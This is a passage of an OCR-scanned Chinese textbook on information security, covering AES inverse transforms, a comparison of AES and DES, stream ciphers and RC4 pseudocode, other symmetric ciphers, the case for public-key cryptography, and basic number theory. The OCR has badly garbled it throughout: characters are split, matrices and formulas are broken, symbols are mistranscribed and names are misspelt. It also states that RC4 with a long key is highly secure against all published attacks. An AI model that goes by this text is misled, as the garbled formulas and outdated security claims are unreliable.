C: 字 节 ,第 二 行 移 C; 字 节 ; 则 对 应 逆行 位 移 变换 为 第 零 行 不 发 生 偏 移 ,第 一 行 循环 左 移 
NN, 一 Ci 字 节 ,第 二 行 移 N, 一 Cs 字 节 ,第 二 行 移 N, 一 Cs 字 节 。 

3. 逆 列 混合 变换 (InvMixColumns()) 


逆 列 混合 变换 InvMixColumns() 是 列 混合 变换 MixColumns() 的 逆 变 换 。 变 换 为 : 
sz) 一 ar1(z)Gs(z) ,这 里 al(z) 王 {00}z3 十 {0d)z2 十 {09}z 十 {0e} ,的 运算 方法 见 上 节 ， 
这 个 表达 式 用 矩阵 可 表示 为 


[5] 0e 06 0d 09][m 

si [a 0e 00 o| 3 

2 0d 09 Oe 0b || sz 

S44 [og 0d 09 | Sai 

当 N,=4 时 ,有 

天 i 。 六 
S00 So So2 So3 S00 Sol So2 $03 
InvMixColumns() | sto sl si sis 


S530 $531 S32 $33 


下 
S22 


/ 
S32 


1 
523 


1/ 
533 


335 AES 加 密 算法 性 能 分 析 


AES 加 密 算 法 和 DES 加 密 算法 有 很 多 的 共同 点 ,都 要 经 过 一 个 S 盒 、 替 换 和 移 位 等 操 
作 , 但 是 ,AES 加 密 算法 最 终 取代 DES, 主 要 有 以 下 几 点 原因 。 

(1) 在 DES 中 , 密 钥 长 度 为 64 比特 ,有 效 密 钥 空 间 仅 为 2”, 这 样 小 的 密 钥 空间 对 像 穷 
举 密 钥 这 样 的 攻击 来 说 显得 太 小 了 。 相 比 之 下 AES 有 更 长 的 密 钥 , 密 钥 长 度 可 为 128 比 
特 、192 比特 和 256 比特 三 种 情况 ,明显 提高 了 加 密 的 安全 性 ,同时 ,对 不 同 机 密级 别 的 信 
息 ,可 采用 不 同 长 度 的 密 钥 ,执行 灵活 性 较 高 。 

(2) 在 DES 中 ,还 存在 一 些 弱 密 钥 和 半 弱 密 钥 。DES 的 16 次 加 密 迭 代 中 使 用 不 同 的 
子 密 钥 是 确保 DES 强度 的 一 种 重要 措施 ,但 实际 上 存在 一 些 密 钥 ,由 它 产生 的 16 个 子 密 钥 
会 部 分 地 重合 甚至 完全 一 致 。 这 样 的 密 钥 为 弱 密 钥 或 半 弱 密 钥 ,它们 的 存在 无 疑 会 降低 
DES 的 强度 。 所 以 ,在 DES 中 ,对 初始 密 钥 的 选取 存在 一 定 的 限制 。 在 AES 中 ,由 于 密 钥 
扩展 函数 的 特点 ,所 产生 的 轮 密 钥 随 机 性 很 强 , 对 初始 密 钥 的 选取 也 没有 特别 的 限制 。 

(3) DES 加 密 算 法 存在 互补 对 称 性 。 若 C= 二 DES(M,K), 则 有 C= 二 DES(M,K), 其 中 
C、M.K 表示 C、M.K 的 非 。 互 补 对 称 性 会 使 DES 在 选择 明文 攻击 下 所 需 的 工作 量 减 半 。 
产生 互补 对 称 性 的 原因 在 于 DES 中 两 次 由 运算 。 而 AES 的 均衡 对 称 结构 既 可 以 提高 执行 
的 灵活 度 , 又 可 防止 差分 分 析 方法 的 攻击 。 

(4) AES 算法 的 实现 更 简单 。AES 算法 的 迭代 次 数 最 多 为 14 次 ,S 盒 只 有 一 个 , 较 之 
DES 的 16 次 迭代 和 8 个 S 盒 要 简单 得 多 。 此 外 ,AES 算法 有 很 强 的 扩散 性 能 ,能 把 非 线性 
部 件 产生 的 非 线 性 很 快 的 扩散 开 ,形成 的 密码 有 很 高 的 随机 性 。 可 有 效 地 防止 差分 分 析 和 
线性 分 析 的 攻击 。 
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(5) AES 算法 在 所 有 的 平台 上 都 表现 良好 ,其 操作 比较 容易 抵御 对 物理 层 实 现 的 某 些 
攻击 ,能 很 好 地 适应 现代 及 将 来 处 理 器 的 发 展 , 有 支持 并 行 处 理 的 能 力 。 因 此 ,无 论 是 从 安 
全 还 是 实现 的 难 易 度 上 考虑 ,AES 采用 RUNDAEL 作为 其 加 密 算法 应 该 是 明智 的 选择 。 


34 序列 密码 
序列 密码 也 称 为 流 密码 ,采用 对 称 密码 体制 , 它 是 密码 学 的 一 个 重要 组 成 部 分 。 
341 序列 密码 的 原理 


“一 次 一 密 "密码 在 理论 上 是 不 可 攻破 的 。 序 列 密码 则 由 "一 次 一 密 "密码 启发 而 来 。 

“一 次 一 密 "密码 使 用 的 密 钥 是 和 明文 一 样 长 的 随机 序列 , 密 钥 越 长 越 安 全 ,但 长 密 钥 的 
存储 、 分 配 都 很 困难 。 序 列 密码 采用 密 钥 生 成 器 ,从 原始 密 钥 生成 一 系列 密 钥 流 用 来 加 密 信 
息 ,每 个 明文 可 以 选用 不 同 的 密 钥 加 密 。 如 果 序 列 密码 所 使 用 的 是 真正 随机 产生 的 .与 消息 
流 长 度 相同 的 二 进 制 序列 ,此 时 的 序列 密码 就 是 “一 次 一 密 ” 的 密码 体制 ,这 种 密码 的 破解 难 
度 很 大 。 

序列 密码 的 关键 就 是 产生 密 钥 流 的 算法 ,该 算法 必须 能 够 产生 可 变 长 的 ,随机 的 、 不 可 
预测 的 密 钥 流 。 另 外 ,保持 通信 双方 的 精确 同步 是 序列 密码 实际 应 用 中 的 关键 技术 。 由 于 
通信 双方 必须 能 够 产生 相同 的 密 钥 流 ,所 以 这 种 密 钥 流 不 可 能 是 真 随机 序列 ,只 能 是 伪 随 
机 流 。 

序列 密码 的 设计 核心 在 于 密 钥 发 生 器 的 设计 ,序列 密码 的 安全 强度 取决 于 密 钥 发 生 器 
产生 的 密 钥 流 的 周期 、 复 杂 度 、 随 机 ( 伪 随 机 ) 特 性 等 ,安全 的 密 钥 流 生成 器 必然 会 使 用 非 线 
性 变换 ,本 节 介绍 的 例子 使 用 的 是 线性 变换 。 二 进 制 序列 密码 体制 的 诱 人 之 处 在 于 它 可 以 
用 硬件 来 实现 ,线性 变换 一 般 采 用 线性 反馈 移 位 寄存 器 (LFSR) 来 实现 ,而 非 线性 变换 目的 
是 增强 密 钥 的 复杂 度 和 随机 特性 ,这 些 变换 一 般 以 线性 移 位 寄存 器 序列 为 基 序列 ,经 过 不 规 
则 采样 函数 变换 等 ,得 到 实用 安全 的 密 钥 流 。 

一 个 典型 的 序列 密码 每 次 加 密 一 个 字 节 的 明文 。 当 然 ,序列 密码 也 可 以 被 设计 为 每 次 
操作 一 比特 或 者 一 个 字 节 的 单元 。 典 型 的 序列 密码 的 结构 如 图 3-16 所 示 。 


密 铀 罕 负 人 
1 
伪 随 机 字 节 伪 随机 字 节 
发 生 器 发 生 器 
( 密 钥 流 发 生 器 ) ( 密 钥 流 发 生 器 ) 
明文 1 密 广 明文 
字 节 流 = 一 字 节 流 一 字 节 流 
M 异 或 加 密 G 异 或 解密 


3-16 流 密码 的 结构 
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在 该 结构 中 , 密 钥 输入 到 一 个 伪 随 机 数 发 生 器 ,该 伪 随 机 数 发 生 器 产生 一 串 随 机 的 8 比 
特 数 。 这 些 按 先后 次 序 产 生 的 随机 数 排 成 序列 , 即 为 一 个 伪 随 机 流 ( 在 不 知道 输入 密 钥 的 情 
况 下 不 可 预知 的 流 ) ,也 就 是 用 于 对 每 个 明文 字 节 进 行 加 密 的 密 钥 流 。 用 于 产生 密 钥 流 的 初 
始 密 钥 也 称 为 “种 子 ”。 

每 产生 一 个 字 节 的 密 钥 ,这 个 密 钥 就 与 同一 时 刻 的 当前 明文 字 节 进 行 异 或 运算 产生 密 
文字 节 ,并 依 此 类 推 产生 密 文 流 。 

例如 ,如 果 发 生 器 产生 的 密 钥 为 01101100 ,而 当前 的 明文 字 节 为 11001100, 则 得 出 的 密 
文字 节 为 


11001100 明文 
@ 01101100 密 钥 流 
10100000 密 文 
解密 时 则 需要 使 用 相同 的 伪 随 机 序列 
10100000 密 文 


由 01101100 密 钥 流 
10100000 明文 

可 以 看 出 ,序列 密码 与 “一 次 一 密 ” 的 区 别 就 在 于 ,“ 一 次 一 密 ” 使 用 的 密 钥 是 真正 的 随机 
数 流 , 而 序列 密码 使 用 的 密 钥 是 伪 随 机 数 流 。 

设计 序列 密码 需要 考虑 以 下 几 个 主要 因素 : 

(1) 密 钥 流 的 周期 要 长 。 伪 随机 数 发 生 器 产生 的 并 非 完 全 随机 的 序列 , 它 是 一 个 产生 
确定 的 比特 流 的 函数 ,该 比特 流 最 终 将 产生 重复 。 重 复 的 周期 越 长 ,相当 于 密 钥 越 长 ,密码 
分 析 也 就 越 困 难 。 

(2) 密 钥 流 应 尽 可 能 地 接近 于 一 个 真正 的 随机 数 流 的 特征 。 例 如 1 和 0 的 个 数 应 大 致 
相同 。 密 钥 流 越 随 机 ,加 密 所 得 的 密 文 也 越 随机 ,分 析 就 越 困 难 。 

(3) 伪 随 机 数 发 生 器 的 输出 取决 于 输入 的 密 钥 的 值 。 

通过 设计 合适 的 伪 随 机 发 生 器 ,序列 密码 可 以 提供 和 相应 密 钥 长 度 分 组 密码 相当 的 安 
全 性 。 而 且 相 对 于 分 组 密码 来 说 ,往往 速度 更 快 且 需要 编写 的 代码 更 少 。 序 列 密码 目前 的 
理论 已 经 比较 成 熟 ,工程 实现 也 比较 容易 ,加 密 效率 高 ,在 许多 重要 领域 得 到 应 用 。 


342 RC4 


RC4 是 RSA 三 人 组 中 的 Ron Rivest 为 RSA 公司 在 1987 年 设计 的 一 种 序列 密码 。 它 
是 一 种 可 变 密 钥 长 度 .面向 字 节 操作 的 序列 密码 。 该 算法 以 随机 置换 为 基础 。 对 该 算法 的 
分 析 显示 ,该 密码 的 周期 大 于 10”。 每 输出 一 字 节 的 结果 仅 需 要 8 一 16 条 机 器 操作 指令 。 
RC4 可 能 是 应 用 最 广泛 的 序列 密码 。 它 被 用 于 SSL/TLS( 安 全 套 接 字 / 传 输 层 安全 协议 ) 标 
准 , 该 标准 是 为 网 络 浏览 器 和 服务 器 间 通 信 而 制定 的 。 它 也 用 于 IEEE802. 1 无 线 局 域 网 中 
的 WEP 协议 。RC4 起 初 是 用 于 保护 商业 机 密 的 。 但 是 在 1994 年 9 月 , 它 的 算法 被 发 布 在 
互联 网 上 ,也 就 不 再 有 什么 商业 机 密 了 。 


56 


信息 安全 原理 及 应 


1. RC4 算法 实现 


RC4 算法 非常 简单 : 用 从 1 一 256 个 字 节 的 可 变 长 度 密 钥 初始 化 一 个 256 个 字 节 的 状 
态 矢 量 $,S 的 元 素 记 为 SL0],S[1],…,SL255], 从 始 至 终 置换 后 的 S 包含 从 0 一 255 的 所 
有 8 比特 数 。 对 于 加 密 和 解密 中 应 用 的 密 钥 流 的 产生 , 密 钥 流 中 的 每 个 密 钥 是 由 S 中 
255 个 元 素 按 一 定 的 方式 选 出 一 个 元 素 而 生成 。 每 生成 一 个 密 钥 ,S$ 中 的 元 素 就 被 重新 置 
换 一 次 。 
1) 初始 化 
开始 时 ,S 中 元 素 的 值 被 置 为 按 升序 从 0 一 255, 即 S[0]==0,S[1]==1,…,S[255] 二 255， 
同时 建立 一 个 临时 矢量 T。 如 果 种 子 密 钥 k 的 长 度 为 256 字 节 , 则 将 K 赋 给 TT。 否则, 若 
KK 的 长 度 为 keylen 字 节 , 则 将 K 的 值 赋 给 了 的 前 keylen 个 元 素 ,并 循环 重复 用 K 的 值 赋 
给 T 剩 下 的 元 素 , 直 到 工 的 所 有 元 素 都 被 赋值 。 其 过 程 如 下 : 
/* 初始化 */ 
For i=0 to 255 do 
Ss[i] = 地 
T[i] = K[i mod keylen]; // 临 时 矢量 (256 字 节 ) 
然后 用 T 产 生 的 $ 的 初始 置换 。 从 SL0] 到 SL255], 对 每 个 SLC 让 ,根据 T[ 门 确定 的 方 
案 , 将 S[ 丫 置换 为 $ 中 的 另 一 字 节 
/* 置 换 * / 
j=0; 
For i=0 to 255 do 
j= (j+S[Li]+T[i]) mod 256; 
Swap(S[i],S[j]); //S 仍然 包含 所 有 值 为 0 一 255 的 元 素 
2) 密 钥 流 的 生成 
矢量 $ 一 旦 完成 初始 化 ,种 子 密 钥 就 不 再 被 使 用 。 密 钥 流 的 生成 是 从 SL0] 一 SL255]， 
对 每 个 S[ 让 ,根据 当前 S 的 值 ,将 S[ 站 与 $ 中 的 另 一 个 字 节 置换 。 当 SL255] 完 成 置换 后 , 操 
作 继 续 重复 ,从 SLO] 开 始 : 
/* 密 钥 流 的 生成 */ 
i=0,j=0s 
While(true) 
i= (i+1) mod 256; 
j= (j + S[i]) mod 256; 
swap(S[i],S[j]); 
t= (SLi] + S[j]) mod 256; 
k= S[t]; 


加 密 中 ,将 的 值 与 下 一 明文 字 节 异 或 ; 解密 中 ,将 的 值 与 下 一 密 文字 节 异 或 。 


2. RC4 的 安全 性 


RC4 算法 的 优点 是 简单 高 效 , 特 别 适合 软件 实现 。 
其 安全 性 当然 也 是 随 着 密 钥 长 度 的 增加 而 增强 。 美 国政 府 对 RC4 算法 软件 的 出 口 做 
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出 了 明确 限制 ,其 密 钥 长 度 不 能 超过 40 位 。1995 年 有 人 在 Internet 网 上 公布 了 一 条 用 40 
位 密 钥 的 RC4 加 密 的 密 文 ,并 提出 了 破译 挑战 。 法 国 的 一 个 研究 小 组 通过 Internet 网 ,用 
了 120 台 计 算 机 和 工作 站 ,结果 只 用 了 8 天 时 间 便 求 出 了 密 钥 。 在 此 之 后 的 第 二 次 破译 挑 
战 中 只 用 了 31. 8 小 时 便 破译 成 功 。 

当然 ,对 于 密 钥 足够 长 (如 128 位 ) 的 RC4, 则 安全 性 就 非常 高 了 。 关 于 分 析 RC4 的 攻 
击 方法 有 许多 公开 发 表 的 文献 ,但 没有 哪 种 方法 对 密 钥 足 够 长 的 RC4 有 效 。 


35 其 他 对 称 加 密 算法 


在 不 同 的 安全 系统 中 ,还 存在 着 其 他 对 称 加 密 算法 ,其 中 包括 : 

(1) IDEA。 国 际 数据 加 密 算 法 (International Data Encryption Algorithm) 是 在 由 旅居 
瑞士 的 华人 来 学 嘉和 他 的 导师 J. L. Massey 共同 开发 的 。IDEA 使 用 128 位 密 钥 ,明文 和 
密 文 分 组 长 度 为 64 位 。 已 被 用 在 多 种 商业 产品 中 。 

(2) CLIPPER 密码 。 采 用 SKIPJACK 算法 ,明文 和 密 文 分 组 长 度 为 64 位 , 密 钥 长 度 
为 80 位 。 

(3) Blowfish。Blowfish 允许 使 用 最 长 为 448 位 的 不 同 长 度 的 密 钥 ,并 针对 在 32 位 处 
理 器 上 的 执行 进行 了 优化 。 

(4) Twofish。Twofish 使 用 128 位 分 组 ,可 以 使 用 128、192 或 256 位 密 钥 。 

(5) CAST-128。CAST-128 使 用 128 位 密 钥 。 它 在 更 新 版 本 的 PGP 中 使 用 。 

(6) GOST。GOST 是 为 了 回应 DES 而 开发 的 俄罗斯 标准 , 它 使 用 256 位 密 钥 。 

所 有 这 些 算法 都 可 能 出 现在 安全 性 产品 中 ,对 于 一 般 性 的 应 用 ,所 有 这 些 算法 都 将 是 足 
够 复杂 的 。 
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41 公 钥 密码 体制 的 产生 


根据 加 密 密 钥 能 否 公开 ,人 们 将 密码 体制 划分 为 两 大 类 ,一 类 叫 传统 密码 体制 , 另 一 类 
叫 公 钥 密 码 体制 。 所 谓 传 统 密码 体制 , 指 的 是 几 千年 来 密码 通信 一 直 沿 用 的 一 类 密码 体制 ， 
这 类 密码 体制 在 加 密 和 解密 时 ,使 用 的 是 同一 个 密 钥 ,或 者 虽然 使 用 不 同 的 密 钥 ,但 是 能 通 
过 加 密 密 角 方便 地 导出 解密 密 钥 ,这 类 密码 体制 也 叫做 对 称 密码 体制 或 单 密 钥 密码 体制 ,这 
在 上 一 章 已 经 阐述 。 显 然 ,加 密 密 钥 是 整个 密码 通信 系统 的 核心 机 密 , 一 旦 加 密 密 钥 被 暴 
露 ,整个 密码 体制 也 就 失去 了 保密 作用 。 

随 着 信息 加 密 技术 应 用 领域 的 扩大 ,尤其 是 从 单纯 的 军事 、 外 交 、 情 报 领域 的 使 用 ,扩大 
到 民用 领域 ,如 商业 金融、 计算 机 通信 网络 中 的 信息 保密 等 ,传统 密码 体制 在 应 用 中 暴露 出 
越 来 越 多 的 缺陷 。 


1. 密 钥 管理 的 麻烦 


密 钥 管理 包括 密 钥 保存 和 分 配 。 密 钥 分 配 是 传统 密码 体制 遇 到 的 最 大 困难 之 一 。 因 为 
在 以 传统 密码 体制 为 基础 的 保密 通信 中 ,通信 双方 所 使 用 的 都 是 同一 个 密 钥 ,而 密 钥 又 是 传 
统 密码 体制 的 核心 , 它 是 绝对 不 能 透露 给 第 三 者 的 。 于 是 ,在 一 次 密码 通信 开始 之 前 ,信息 
的 发 送 方 必须 提前 把 所 用 的 保密 密 钥 经 过 特殊 的 秘密 渠道 ,如 信使 ,挂号 信 等 ,或 者 经 一 条 
特殊 的 保密 通信 线路 , 即 密 钥 信 道 , 送 到 信息 的 接收 方 。 在 计算 机 通信 网 中 , 则 要 由 主机 把 
该 次 所 用 的 密 钥 发 送 给 交换 信息 的 两 个 用 户 。 

经 特殊 的 密 钥 信道 分 配 保密 密 钥 是 相当 困难 的 , 随 着 系统 用 户 的 增加 ,这 种 困难 程度 变 
得 越 来 越 严重 。 而 近代 商用 和 民用 密码 通信 的 特征 之 一 就 是 用 户 很 多 ,如 在 一 个 民用 密码 
通信 和 网 中 ,用 户 数 为 n 则 每 个 用 户 都 要 保存 个 密 钥 。 包 括 他 自己 的 密 钥 。 系 统 可 能 的 用 
户 对 数 , 亦 即 系统 拥有 的 密 钥 总 数 将 增加 到 n(n 一 1)/2 个 。 一 个 拥有 10 万 用 户 的 民用 密码 
通信 网 就 要 拥有 近 50 亿 个 密 钥 。 显然, 要 十 分 妥善 地 保存 这 些 密 钥 , 本 身 就 是 一 个 难题 。 
而 要 经 特殊 的 保密 信道 分 配 这 么 多 密 钥 ,更 是 难以 想象 。 

试想 要 做 到 真正 保密 ,那么 每 两 个 用 户 之 间 都 需要 一 条 秘密 信道 ,这 在 经 济 上 也 是 绝对 
不 允许 的 。 不 仅 如 此 , 按 传统 方法 分 配 密 钥 .必然 带 来 实际 通信 时 间 的 推迟 ,然而 在 商业 上 ， 
时 间 的 贻误 往往 意味 着 经 济 的 损失 ,这 是 任何 一 个 商业 用 户 所 不 希望 的 。 


2. 密 钥 难以 传输 


对 称 密码 体制 的 解密 密 钥 和 加 密 密 钥 相 同 或 容易 从 加 密 密 钥 导出 ,因而 加 密 密 钥 的 暴 
露 会 使 系统 变 得 不 安全 。 对 称 密码 体制 的 一 个 严重 缺陷 是 在 任何 密 文 传输 之 前 ,发 送 者 和 
接收 者 必须 使 用 一 个 安全 信道 预先 传送 密 钥 , 在 实际 应 用 中 这 一 点 是 很 难 做 到 的 。 例 如 , 假 
定 发 送 者 和 接收 者 之 间 的 距离 很 远 , 他 们 要 使 用 电子 邮件 来 通信 ,在 这 种 情况 下 ,通信 双方 
可 能 没有 合理 的 安全 信道 。 


3. 不 能 提供 法 律 证 据 


在 现今 国际 和 国内 的 商业 往来 中 ,合同 和 协议 的 真实 性 是 由 书面 签字 来 保证 的 ,一 张 签 
字 的 合同 可 以 作为 法 律 上 的 证 据 。 

但 是 现代 电子 通信 最 易于 剪接 、 复 改 和 伪造 。 要 用 电子 信件 代 蔡 书面 信件 ,不 仅 要 解决 
保密 问题 ,而 且 要 解决 证 实 问题 。 

信息 的 证 实 是 指 两 个 方面 : 一 方面 是 指 对 发 送 方 的 证 实 , 另 一 方面 是 指 对 接收 方 的 证 
实 ,也 就 是 能 够 确认 接收 方 所 收 到 和 保存 的 信息 确实 是 由 发 送 方 发 出 的 , 既 不 是 伪造 的 ,也 
没有 经 过 包括 接收 方 在 内 的 其 他 人 所 自 改 。 

在 传统 密码 体制 中 ,接收 方 利 用 保密 密 钥 ,对 密 文 信息 进行 解密 变换 ,能 成 功 地 解决 信 
息 的 保密 问题 。 因 为 只 有 掌握 解密 密 钥 的 合法 接收 者 ,才能 从 密 文 恢复 出 明文 ,这 能 够 解决 
接收 方 对 发 送 方 的 证 实 问题 ,使 接收 方 能 够 确认 该 信息 确实 是 由 发 送 方 送出 的 。 但 是 却 无 
法 解决 对 接收 方 的 证 实 问题 ,因为 接收 方 所 掌握 的 解密 密 钥 和 发 送 方 的 加 密 密 钥 相同 ,完全 
有 能 力 算 改 他 接收 到 的 文件 或 伪造 文件 。 

基于 同样 的 理由 发 送 方 完全 有 借口 抵赖 他 曾 发 出 的 文件 ,例如 ,用 户 甲 利用 商用 密码 通 
信 向 用 户 乙 订购 了 一 批 货物 ,用 户 乙 如 数 寄 出 。 后 来 由 于 该 商品 价格 猛 跌 , 用 户 甲 拒 绝 付 
款 , 这 样 甲乙 双方 就 发 生 争 端 ,由 于 上 述 原 因 , 用 户 乙 不 能 提供 有 说 服 力 的 法 律 证 据 , 此 案 则 
法 院 无 法 受理 。 

基于 这 种 原因 ,传统 密码 体制 难以 在 商业 上 获得 更 广泛 的 应 用 。 


4. 缺乏 自动 检测 密 钥 泄密 的 能 力 


由 于 传统 密码 体制 在 分 配 密 钥 上 的 实际 困难 ,因此 通信 密 钥 一 旦 指定 ,总 要 使 用 一 定时 
间 ,难以 随时 更 换 , 更 难 一 次 一 换 。 所 以 ,窃听 者 一 旦 破译 出 通信 密 钥 , 则 在 该 密 钥 有 效 使 用 
期 内 就 能 顺利 地 破译 出 该 密 钥 加 密 的 所 有 信息 。 而 合法 的 密码 通信 双方 却 无 法 察觉 ,显然 
这 将 会 使 通信 双方 蒙受 巨大 的 损失 。 

为 了 对 付 密 钥 失窃 所 带 来 的 损失 和 人 危害 ,最 好 采用 一 次 一 密 的 密码 体制 , 即 每 次 通信 都 
采用 不 同 的 密 钥 ,这 要 求 密 钥 的 分 配 迅 速 、 保 密 和 经 济 。 而 传统 密码 体制 是 做 不 到 这 一 点 
的 。 为 此 ,人 们 希望 能 设计 出 一 种 新 的 密码 ,从 根本 上 克服 传统 密码 在 密 钥 管理 上 的 困难 ， 
而 且 容易 实现 数字 签名 ,从 而 适合 计算 机 网 络 环境 的 各 种 应 用 。 

1976 年 由 当时 在 美国 斯 坦 福 大 学 的 迪 菲 (Diffie) 和 赫 尔 曼 (Hellman) 发 表 了 “New 
Direction in Cryptography” 一 文 , 第 一 次 提出 了 公 钥 密码 体制 的 概念 ,从 此 开创 了 密码 学 的 
新 时 代 。 
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它 的 体制 思想 不 同 于 传统 的 对 称 密码 体制 。 它 要 求 密 钥 成 对 出 现 ,一 个 为 加 密 密 钥 
(K.), 另 一 个 为 解密 密 钥 (Ks), 且 不 可 能 从 其 中 一 个 推导 出 男 一 个 。 加 密 密 钥 可 以 发 布 出 
去 作为 公共 密 钥 , 而 解密 密 钥 秘密 保存 。 用 公共 密 钥 加 密 的 信息 只 能 用 专用 密 钥 解密 ,反之 
亦 然 。 

由 于 公 钥 算法 不 需要 联机 密 钥 服务 器 , 密 钥 分 配 协议 简单 ,所 以 极 大 简化 了 密 钥 管 理 。 
除 加 密 功 能 外 , 公 钥 系统 还 可 以 提供 数字 签名 。 

自 1976 年 以 来 ,已 经 提出 了 多 种 公 钥 密码 算法 ,其 安全 基础 是 基于 一 些 数学 问题 ,专家 
们 认为 这 些 问题 在 短期 内 不 可 能 得 到 解决 ,因为 一 些 问题 (如 因子 分 解 问题 ) 至 今 已 有 数 千 
年 的 历史 。 


42 数论 基础 


数论 中 的 许多 概念 在 设计 公 钥 密码 算法 时 是 必 不 可 少 的 。 掌 握 这 些 基 础 知识 对 于 理解 
公 钥 密码 体制 的 原理 和 应 用 十 分 重要 。 


421 基本 概念 


1. 整除 


定理 : 设 整 数 a 和 4b ,如果 存在 整数 ,使 6 二 ak, 则 说 5 能 被 4a 整除 , 记 做 : a15。 例 如 : 
15 能 被 3 整除 : 3115 ,60 能 被 一 15 整除 : 一 15160。 

整除 有 两 个 性 质 : 

(1) 对 所 有 整数 a 了 0,a10、ala 成 立 ; 

(2) 对 任意 整数 5,116 成 立 。 


2. 素数 


定义 : 如 果 整 数 p(p 二 1) 只 能 被 1 或 者 它 本 身 整除 ,而 不 能 被 其 他 整数 整除 , 则 其 为 素 
数 ,否则 为 合 数 。 

例如 ,2,3,5,7,11,13,17 等 都 是 素数 。 

素数 的 数量 是 很 多 的 ,其 数量 满足 素数 定理 : 设 x(z) 是 小 于 zz 的 素数 的 个 数 , 则 

r(z) xz/ln(z), 且 当 z 一 co 时 ,rCz)/(inz) 一 1 
也 就 是 说 ,小 于 > 的 素数 的 个 数 大 约 有 ln(z) 个 。 
在 各 种 应 用 中 ,我 们 通常 需要 大 的 素数 ,如 100 位 的 素数 ,其 个 数 大 约 有 : 
x(10'®)—x(10”) 23.9X10” 个 

素数 是 构成 整数 的 因子 ,每 一 个 整数 都 是 由 一 个 或 几 个 素数 的 不 同 次 竹 相 乘 得 来 的 。 
例如 ,91 二 7X13,11011 二 7X11?X13,3600 二 2+X3?X5。 也 就 是 说 ,任何 一 个 整数 ,都 可 
以 分 解 为 素数 的 乘积 。 


3. 最 大 公约 数 
定义 : a 和 2 的 最 大 公约 数 是 能 够 同时 整除 a 和 4 的 最 大 正 整数 , 记 为 gcdCa ,0) 。 
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例如 ,4 是 16 和 20 的 最 大 公约 数 , 即 4 一 gcd(16,20) 。 

如 果 gcd(a,5) 二 1, 则 说 a 和 46 是 互 素 的 。 注 意 ,a 和 2 是 互 素 的 ,并 不 一 定 a 或 者 b 是 
素数 。 例 如 ,gcd(14,15) 二 1, 即 14 和 15 互 素 , 但 它们 都 不 是 素数 。 

定理 : 设 a 和 4 是 两 个 整数 (至 少 一 个 非 0) ,4d 二 gcd(a,6), 则 存在 整数 x 和 y, 使 得 
azx 十 by 二 d ,特殊 地 ,如 果 a 和 6 互 素 , 则 有 整数 x 和 y ,使 得 ax 十 by 一 1。 


4. 同 余 


设 整 数 a,6b,n(n 关 0), 如 果 a 一 b 是 n 的 整数 倍 , 即 a= 二 5 十 kn,k 为 整数 , 则 a 二 
b(mod n) , 称 为 a 同 余 于 4 模 n。 也 可 理解 为 a/n 的 余数 等 于 4b/n 的 余数 。 
模 运 算 , 也 就 是 求 余 运算 。(mod n) 运 算 将 所 有 的 整数 (无 论 小 于 n 还 是 大 于 nn) ,都 映 
射 到 {0,1,…,n 一 1) 组 成 的 集合 。 
模 运 算 显然 具有 下 列 几 个 性 质 。 
(1) (a mod n) 十 (0 mod n) (a+b) mod n, 
(2) (a mod n)—(b mod n)(a—b) mod n。 
(3) (a mod n) X (b mod n)(a Xb) mod n。 
这 里 我 们 仅 对 第 三 个 性 质 进行 证 明 : 
设 z== a modn,y 二 6modn, 即 z==a 十 有 ins,y 二 0 十 kon,ki 和 ks 为 整数 。 那 么 
(amodn)X(bmodn)= zy (athkin) (b+hksn) = abt (aks okit kk n 
因为 a,6b,ki ,k,n 丝 为 整数 ,所 以 (aks 十 bki 十 kikzn) 一 K 也 是 整数 , 即 
(a modn)X (b modn)= ab+itRn 


即 
(a modn)X (bmodn) 二 (aXb) modn 
得 证 。 
性 质 : 有 整数 a,b,c,n(n 天 0) 。 
(1) 如 果 o=0(mod n) ,6 三 c(mod n) ,那么 a 三 c(mod n)。 
(2) 如 果 a 夺 b(mod n) ,c 三 d(mod n) ,那么 a 十 c 夺 6 十 d ,a 一 c 三 6 一 d ,ac 夺 bd (mod n)。 
证 明 (1): 因为 a 三 b(mod n) ,6b 三 c(mod n), 即 
a =6b++hkn,b = c+ ken 


所 以 
a=c 二 ken 二 hin = ct (ki ks)n 

即 a 等 于 c 加 上 的 整数 倍 , 即 a 三 c(mod n)。 

证 明 (2): 这 里 仅 证 明 ac 志 bd (mod n)。 

因为 

a 三 b(mod n),c d(modn) 
即 
a=b++hnc= dkn 
所 以 
ac = (b+Rkin) (d+ kan) 一 bd (bks+t dkitnkik )n 

其 中 二 (bks 十 dk 十 nkiks) 为 整数 , 即 
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ac 一 bd 十 天 7 
所 以 
ac 三 bd (modn) 
得 证 。 
例题 : 利用 模 运 算 的 性 质 ,计算 11 (mod 13)。 
解 : 这 里 我 们 并 没有 必要 先 计算 117 ,然后 除 以 13 求 余数 。 
因为 11 二 11(mod 13) 
所 以 11: 志 (11X11)(mod 13) 三 121(mod 13) 三 4(mod 13) 
所 以 11: 寺 4? (mod 13) 志 3(mod 13) 
所 以 11 三 (11X4X3)(mod 13) 夺 132(mod 13) 夺 2(mod 13) 
所 以 11’ (mod 13) 一 2 
请 读者 自行 计算 2 mod 789( 答 案 : 2'*mod 789 一 481) 。 


5. 除法 


定理 : 设 整 数 a,b,c,n(n 天 0), 且 gcd(a,n) 王 1, 如果 ab 三 ac (mod n), 那 么 5 二 
c(mod n), 

证 明 : 因为 gcd(a,n) 二 1 

所 以 存在 整数 x 和 >y ,使 得 az 十 by 一 1( 见 最 大 公约 数 性 质 ) 

两 边 同 乘 (0 一 c) 得 到 : (0 一 c)Coz 十 by) 一 0 一 c, 即 

(ab 一 ac)z 十 m( 一 c)y 一 0 一 c OO 

因为 ao=acCmod n), 即 ab 二 ac 十 kn(ki 为 整数 ) 

所 以 (ab 一 ac) 是 nn 的 倍数 ,同时 ,n(b 一 中 y 当然 也 是 n 的 倍数 ,所 以 两 者 相 加 (ab 一 ac)z 十 
MO 一 c)y 所 得 也 是 n 的 倍数 。 

所 以 由 式 得 : 6 一 c= 二 kon,ks 为 整数 , 即 6 三 c(mod n)。 


422 欧 几 里 得 算法 


当 要 求 两 个 整数 a 和 6 的 最 大 公约 数 gcd(a,6) 时 ,如 果 a 和 6 的 值 比较 小 ,可 以 很 容易 
地 求 出 它们 的 最 大 公约 数 ,但 是 如 果 a 和 4 的 值 很 大 , 则 不 那么 容易 了 。 这 里 可 以 采用 欧 几 
里 得 (Euclid) 算 法 。 

欧 几 里 得 算法 基于 以 下 的 定理 : 对 于 任意 非 负 整数 c 和 任意 正 整 数 5 ,有 

gcd(a,b) = gcd(b,a mod b) 

例如 ,gcd(55,22) 一 gcd(22,55 mod 22) 一 gcd(22,11) 一 11。 

其 算法 描述 如 下 : 

